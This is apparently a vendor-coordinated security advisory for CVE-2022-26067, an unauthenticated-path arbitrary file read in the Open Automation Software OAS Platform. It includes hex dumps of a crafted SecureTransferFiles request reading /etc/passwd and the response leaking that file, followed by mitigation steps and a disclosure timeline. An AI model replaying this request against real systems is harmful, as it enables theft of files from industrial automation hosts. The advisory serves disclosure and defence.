CVE-2022-26067
An information disclosure vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. A specially-crafted series of network requests can lead to arbitrary file read. An attacker can send a sequence of requests to trigger this vulnerability.
Open Automation Software OAS Platform V16.00.0112
OAS Platform - https://openautomationsoftware.com/knowledge-base/getting-started-with-oas/
4.9 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
CWE-306 - Missing Authentication for Critical Function
The OAS Platform was built to facilitate the simplified transfer of data between various proprietary devices and applications. It can be used to connect products from multiple different vendors, connect a product to a custom application, and more.
By sending a series of properly-formatted configuration messages to the OAS Platform, it is possible to read an arbitrary file at any location permissible by the underlying user. By default these messages can be sent to TCP/58727 and, if successful, will be processed by the user oasuser with normal user permissions.
Before the transfer of a file will be accepted, it is necessary that a Security Group with File Transfer permissions and a User Account in that group exist. Both the Security Group and the User Account referred to here are elements within the OAS Platform, not on the underlying Linux machine. If an acceptable Security Group and User Account already exist, the necessary credentials can be sniffed off the network and used for the transfer. If they do not exist, they would need to be created before exploitation would be possible.
A valid SecureTransferFiles command resembles the following:
0000 00 0c 29 5e b3 62 c4 b3 01 c3 ba c9 08 00 45 00 ..)^.b........E.
0010 00 ff 00 00 40 00 40 06 a4 06 c0 a8 0a 6a c0 a8 ....@.@......j..
0020 0a 38 c4 e4 e5 67 c9 f5 cd 34 94 6c 24 2e 80 18 .8...g...4.l$...
0030 08 0a 21 f0 00 00 01 01 08 0a bb 15 e8 9d d6 18 ..!.............
0040 2b 37 00 00 00 00 00 60 68 40 00 01 00 00 00 ff +7.....`h@......
0050 ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00 ................
0060 03 00 00 00 08 08 01 00 00 00 06 02 00 00 00 13 ................
0070 53 65 63 75 72 65 54 72 61 6e 73 66 65 72 46 69 SecureTransferFi
0080 6c 65 73 09 03 00 00 00 10 03 00 00 00 04 00 00 les.............
0090 00 08 08 01 00 00 00 06 04 00 00 00 0d 4d 61 6c .............Mal
00a0 69 63 69 6f 75 73 55 73 65 72 06 05 00 00 00 20 iciousUser.....
00b0 31 4d 5a 4a 32 58 54 65 41 77 69 38 38 2b 61 59 1MZJ2XTeAwi88+aY
00c0 78 62 55 30 37 76 2b 6b 34 47 57 4a 69 56 50 78 xbU07v+k4GWJiVPx
00d0 09 06 00 00 00 10 06 00 00 00 01 00 00 00 09 07 ................
00e0 00 00 00 10 07 00 00 00 03 00 00 00 08 08 02 00 ................
00f0 00 00 06 08 00 00 00 03 6f 75 74 06 09 00 00 00 ........out.....
0100 0b 2f 65 74 63 2f 70 61 73 73 77 64 0b ./etc/passwd.
Once the required Security Group and User Account have been created, a file of choice can be read from the underlying linux machine at any path permissible by the user owning the oas-engine service, through use of the SecureTransferFiles command accompanied with the newly created (or sniffed) credentials. When a SecureTransferFiles command is successfully processed, the response will contain the contents of the requested file. This response resembles the following:
0000 c4 b3 01 c3 ba c9 00 0c 29 5e b3 62 08 00 45 00 ........)^.b..E.
0010 0a de 3b ca 40 00 40 06 5e 5d c0 a8 0a 38 c0 a8 ..;.@.@.^]...8..
0020 0a 6a e5 67 c4 e4 94 6c 24 2e c9 f5 cd ff 80 18 .j.g...l$.......
0030 01 fc a0 c3 00 00 01 01 08 0a d6 18 2b 3c bb 15 ............+<..
0040 e8 9d 00 00 00 00 00 44 a5 40 00 01 00 00 00 ff .......D.@......
0050 ff ff ff 01 00 00 00 00 00 00 00 10 01 00 00 00 ................
0060 02 00 00 00 06 02 00 00 00 07 53 75 63 63 65 73 ..........Succes
0070 73 09 03 00 00 00 10 03 00 00 00 01 00 00 00 09 s...............
0080 04 00 00 00 10 04 00 00 00 03 00 00 00 08 08 01 ................
0090 00 00 00 06 05 00 00 00 0b 2f 65 74 63 2f 70 61 ........./etc/pa
00a0 73 73 77 64 09 06 00 00 00 0f 06 00 00 00 38 0a sswd..........8.
00b0 00 00 02 72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f ...root:x:0:0:ro
00c0 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 ot:/root:/bin/ba
00d0 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a sh.daemon:x:1:1:
00e0 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e daemon:/usr/sbin
00f0 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 :/usr/sbin/nolog
0100 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e in.bin:x:2:2:bin
The easiest way to mitigate attempts to exploit this vulnerability is to prevent access to the configuration port (TCP/58727 by default) when not actively configuring the OAS Platform. Additionally, use a dedicated user account to run the OAS Platform and ensure that user account does not have any more permissions than absolutely necessary.
2022-03-16 - Vendor Disclosure
2022-05-22 - Vendor Patch Release
2022-05-25 - Public Release
Discovered by Jared Rittle of Cisco Talos.